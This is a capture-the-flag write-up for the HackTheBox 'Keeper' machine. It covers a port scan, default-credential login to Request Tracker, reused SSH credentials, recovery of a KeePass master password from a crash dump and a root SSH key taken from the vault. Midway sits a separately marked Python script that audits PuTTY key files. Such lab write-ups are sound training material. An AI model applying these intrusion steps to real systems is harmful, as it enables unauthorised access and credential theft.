HackTheBox :: Keeper
Creator: knightmare
Machine URL: https://app.hackthebox.com/machines/Keeper
Difficulty: Easy
Initial enumeration
As usual, we start with a full TCP port nmap scan.
# Nmap 7.94 scan initiated Sat Aug 12 21:03:18 2023 as: nmap -p- -oA nmap/nmap_initial --min-rate=4000 -vv -sC -sV 10.129.229.41
Nmap scan report for keeper.htb (10.129.229.41)
Host is up, received echo-reply ttl 63 (0.037s latency).
Scanned at 2023-08-12 21:03:19 CEST for 24s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKHZRUyrg9VQfKeHHT6CZwCwu9YkJosNSLvDmPM9EC0iMgHj7URNWV3LjJ00gWvduIq7MfXOxzbfPAqvm2ahzTc=
| 256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBe5w35/5klFq1zo5vISwwbYSVy1Zzy+K9ZCt0px+goO
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 12 21:03:43 2023 -- 1 IP address (1 host up) scanned in 25.48 seconds
Only two ports are open: TCP 80 for nginx and TCP 22 for SSH.
We will target the Web Server on TCP 80 first.
nginx
After navigating to the machine IP in the browser, we are greeted with a simple web page:
After adding keeper.htb and tickets.keeper.htb to our hosts file, we can visit http://tickets.keeper.htb/rt/
Best Practical Request Tracker (RT)
We have the login page for Best Practical Request Tracker (RT):
Software version: 4.4.4
Source code: GitHub
We note that the version is fairly old and we may find some unpatched vulnerabilities.
But first, we can try the default username and password.
Fortunately, root:password works!
Interesting tickets
There is only one of interest – http://tickets.keeper.htb/rt/Ticket/Display.html?id=300000
We note the info it gives us:
- root (Enoch Root) had issues with a KeePass database on Windows and attached its crash dump to an issue.
- lnorgaard (Lise Nørgaard) removed the attachment and saved it to their home folder for security reasons.
Credentials for lnorgaard
While browsing further through the app, in the Admin –> Users section we find a default password for user lnorgaard in their comments section:
http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27
These credentials are reused and we can SSH to the box as lnorgaard.
lnorgaard
Grab a user flag in /home/lnorgaard/user.txt
The home folder contains a ZIP archive RT30000.zip. This must be the file relevant to the ticket we’ve seen before.
Transfer it to the attacking machine and unzip it.
┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ unzip RT30000.zip
Archive: RT30000.zip
inflating: KeePassDumpFull.dmp
extracting: passcodes.kdbx
We get the crash dump for KeePass and a KeePass database file.
Extracting the KeePass master password from the dump file
It may be possible to extract the master password from the dump file!
I’ve attempted to use this Python script for the task: https://github.com/CMEPW/keepass-dump-masterkey
┌──(fluff㉿kali)-[/tmp/keepass-dump-masterkey]
└─$ python3 poc.py -d /opt/ctf/htb/keeper/KeePassDumpFull.dmp
2023-08-12 21:35:47,517 [.] [main] Opened /opt/ctf/htb/keeper/KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
...
There are some issues with special characters. A quick Google search for dgrd med flde reveals the name of the Danish dish – Rødgrød med fløde.
I will use the kpcli utility to interact with the KeePass database file that we have looted.
┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ kpcli
KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/> open passcodes.kdbx
Provide the master password: ************************* #Rødgrød med fløde
Error opening file: Couldn't load the file passcodes.kdbx
Error(s) from File::KeePass:
The database key appears invalid or else the database is corrupt.
kpcli:/> open passcodes.kdbx
Provide the master password: ************************* #rødgrød med fløde
kpcli:/> ls
=== Groups ===
passcodes/
Success! The KeePass database master password is rødgrød med fløde (note the lowercase first letter; the capitalised variant was rejected).
Let’s find some credentials.
SSH Private Key for root
kpcli:/> ls *
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
kpcli:/> ls */*
/passcodes/eMail:
/passcodes/General:
/passcodes/Homebanking:
/passcodes/Internet:
/passcodes/Network:
=== Entries ===
0. keeper.htb (Ticketing Server)
1. Ticketing System
/passcodes/Recycle Bin:
=== Entries ===
2. Sample Entry keepass.info
3. Sample Entry #2 keepass.info/help/kb/testform.
/passcodes/Windows:
kpcli:/>
kpcli:/> cd /passcodes/Network
kpcli:/passcodes/Network> ls
=== Entries ===
0. keeper.htb (Ticketing Server)
1. Ticketing System
kpcli:/passcodes/Network> show -f 0
Title: keeper.htb (Ticketing Server)
Uname: root
Pass: <REDACTED>
URL:
Notes: PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
<REDACTED>
It looks like we have a root SSH private key for PuTTY!
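The notes field above holds a PuTTY private key file (PPK version 3) whose header says Encryption: none, so anyone who reads the vault entry gets a usable root key with no passphrase in the way. The following script is an added example, not part of the original writeup or of PuTTY's own code: it parses the PPK header and the public blob, reports the key type, modulus size and whether the private part is passphrase-protected, and flags what a reviewer auditing stored keys would want to know. The sample PPK text is constructed inside the script with a dummy modulus; it is not the key from the box, and the layout it assumes (header lines up to Public-Lines, then base64 lines, then Private-Lines and Private-MAC, with the Argon2 lines present only for encrypted v3 keys) follows PuTTY's documented format.

```python
import base64
import struct

# --- constructed sample input (not the key from the box) ----------------------

def _ssh_string(data: bytes) -> bytes:
    """Encode an SSH wire-format string: 4-byte big-endian length + bytes."""
    return struct.pack(">I", len(data)) + data

def _ssh_mpint(n: int) -> bytes:
    """Encode a non-negative integer as an SSH mpint (leading 0x00 if top bit set)."""
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    if raw and raw[0] & 0x80:
        raw = b"\x00" + raw
    return _ssh_string(raw)

def make_sample_ppk(encrypted: bool = False) -> str:
    """Build a PPK v3 text with a dummy RSA public blob (constructed, not a real key)."""
    e = 65537
    n = (1 << 2047) | 1          # dummy 2048-bit odd number standing in for a modulus
    pub_blob = _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)
    pub_b64 = base64.b64encode(pub_blob).decode()
    pub_lines = [pub_b64[i:i + 64] for i in range(0, len(pub_b64), 64)]
    lines = [
        "PuTTY-User-Key-File-3: ssh-rsa",
        "Encryption: aes256-cbc" if encrypted else "Encryption: none",
        "Comment: rsa-key-20230519",
    ]
    if encrypted:
        # Header lines PuTTY writes for passphrase-protected v3 keys
        lines += ["Key-Derivation: Argon2id", "Argon2-Memory: 8192",
                  "Argon2-Passes: 13", "Argon2-Parallelism: 1",
                  "Argon2-Salt: " + "00" * 16]
    lines += [f"Public-Lines: {len(pub_lines)}"] + pub_lines
    # Dummy private section: the parser below never decodes it
    lines += ["Private-Lines: 1", base64.b64encode(b"\x00" * 48).decode()]
    lines += ["Private-MAC: " + "00" * 32]
    return "\n".join(lines) + "\n"

# --- parser and audit ------------------------------------------------------------

def _read_string(blob: bytes, pos: int):
    """Read one SSH wire-format string starting at pos; return (bytes, next_pos)."""
    (length,) = struct.unpack_from(">I", blob, pos)
    start = pos + 4
    return blob[start:start + length], start + length

def parse_ppk(text: str) -> dict:
    """Parse the header and public blob of a PPK file; the private part is left alone."""
    lines = text.splitlines()
    magic, sep, algorithm = lines[0].partition(":")
    if not sep or not magic.startswith("PuTTY-User-Key-File-"):
        raise ValueError("not a PuTTY private key file")
    info = {"version": int(magic.rsplit("-", 1)[1]), "algorithm": algorithm.strip()}
    i = 1
    while i < len(lines) and not lines[i].startswith("Public-Lines:"):
        key, _, value = lines[i].partition(":")
        info[key.strip()] = value.strip()
        i += 1
    if i == len(lines):
        raise ValueError("Public-Lines header missing")
    count = int(lines[i].split(":", 1)[1])
    blob = base64.b64decode("".join(lines[i + 1:i + 1 + count]))
    key_type, pos = _read_string(blob, 0)
    info["key_type"] = key_type.decode()
    info["encrypted"] = info.get("Encryption", "none") != "none"
    if info["key_type"] == "ssh-rsa":
        _e, pos = _read_string(blob, pos)          # public exponent, not needed here
        n_bytes, _ = _read_string(blob, pos)       # modulus as mpint
        info["modulus_bits"] = int.from_bytes(n_bytes, "big").bit_length()
    return info

def audit_ppk(text: str) -> list:
    """Return the findings a reviewer would raise for a PPK file found in storage."""
    info = parse_ppk(text)
    findings = []
    if not info["encrypted"]:
        findings.append("private key is stored without a passphrase (Encryption: none)")
    if info["version"] < 3:
        findings.append("legacy PPK version %d" % info["version"])
    if info.get("modulus_bits", 4096) < 2048:
        findings.append("RSA modulus below 2048 bits")
    return findings

if __name__ == "__main__":
    for flag in (False, True):
        sample = make_sample_ppk(encrypted=flag)
        print(parse_ppk(sample)["Comment"], audit_ppk(sample) or "no findings")
```

Run against the entry from the box, the audit would report the unencrypted key; against the constructed passphrase-protected variant it reports nothing. The parser stops at the public blob on purpose, so it can be run over a backup or vault export without ever handling private key material.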
Let’s convert it to the OpenSSH-acceptable format with puttygen:
┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ puttygen key.putty -O private-openssh -o id_rsa
And use the key to SSH:
┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ ssh [email protected] -i id_rsa
...
root@keeper:~# id
uid=0(root) gid=0(root) groups=0(root)
root@keeper:~#
We are root!
Grab the root flag in /root/root.txt and we are done.